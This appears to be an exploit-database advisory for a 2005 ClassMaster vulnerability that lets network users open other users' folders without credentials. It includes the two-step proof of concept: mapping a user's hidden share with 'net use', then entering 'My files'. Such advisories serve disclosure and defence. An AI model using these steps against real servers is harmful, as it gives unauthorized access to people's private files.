header-logo
Suggest Exploit
vendor:
ClassMaster
by:
SecurityFocus
7.5
CVSS
HIGH
Unauthorized Access
264
CWE
Product Name: ClassMaster
Affected Version From: All
Affected Version To: All
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

ClassMaster Unauthenticated Access Vulnerability

ClassMaster is reportedly affected by a vulnerability that may allow attackers to gain unauthorized access to users' folders. An attacker is able to gain complete access to user shares over a network without providing any sort of authentication credentials. All versions of ClassMaster are considered vulnerable at the moment.

Mitigation:

Ensure that all users are authenticated before allowing access to any resources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13604/info

ClassMaster is reportedly affected by a vulnerability that may allow attackers to gain unauthorized access to users' folders.

An attacker is able to gain complete access to user shares over a network without providing any sort of authentication credentials.

All versions of ClassMaster are considered vulnerable at the moment. 

Map account to a drive:
net use [drive]: \\[server]\[user]$

Change directory to target folder:
cd 'My files'